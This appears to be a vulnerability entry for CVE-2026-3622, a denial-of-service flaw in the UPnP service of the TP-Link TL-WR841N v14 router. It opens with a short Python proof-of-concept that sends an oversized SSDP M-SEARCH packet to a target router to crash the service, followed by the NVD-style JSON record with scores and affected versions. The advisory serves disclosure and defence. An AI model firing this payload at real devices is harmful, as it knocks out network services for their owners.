CVE-2026-3622

import socket # Conceptual Proof of Concept (PoC) for CVE-2026-3622 # This script sends a malformed packet to the UPnP service to trigger the crash. target_ip = "192.168.0.1" # Replace with the target router IP target_port = 1900 # UPnP standard port, actual vulnerable port may vary # Crafting a payload with improper input validation to trigger out-of-bounds read # The exact payload structure is derived from vulnerability analysis payload = b"M-SEARCH * HTTP/1.1\r\n" \ b"HOST: 239.255.255.250:1900\r\n" \ b"MAN: \"ssdp:discover\"\r\n" \ b"MX: 2\r\n" \ b"ST: " + b"A" * 500 + b"\r\n\r\n" # Long string to trigger potential overflow/OOB try: print(f"[*] Sending exploit payload to {target_ip}...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (target_ip, target_port)) print("[+] Payload sent successfully. Check device status.") sock.close() except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-3622", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-26T21:17:09.697", "lastModified": "2026-03-31T19:09:04.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in the UPnP component of TL-WR841N v14, where improper input validation leads to an out-of-bounds read, potentially causing a crash of the UPnP service. \n\nSuccessful exploitation can cause the UPnP service to crash, resulting in a Denial-of-Service condition. \nThis vulnerability affects TL-WR841N v14 < EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303) and < US_0.9.1.4.19 Build 260312 Rel. 49108n (V14_0304)."}, {"lang": "es", "value": "La vulnerabilidad existe en el componente UPnP del TL-WR841N v14, donde una validación de entrada incorrecta conduce a una lectura fuera de límites, lo que podría causar una caída del servicio UPnP.\n\nUna explotación exitosa puede provocar la caída del servicio UPnP, lo que resulta en una condición de Denegación de Servicio.\nEsta vulnerabilidad afecta a TL-WR841N v14 &lt; EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303) y &lt; US_0.9.1.4.19 Build 260312 Rel. 49108n (V14_0304)."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.1_4.19", "matchCriteriaId": "B8FFCB9A-B16E-496A-A213-2886E262CFDC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tl-wr841n:14:*:*:*:*:*:*:*", "matchCriteriaId": "D74FA034-63F6-4F9E-BC24-364B94732E29"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/tl-wr841n/v14/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/download/tl-wr841n/v14/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5033/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}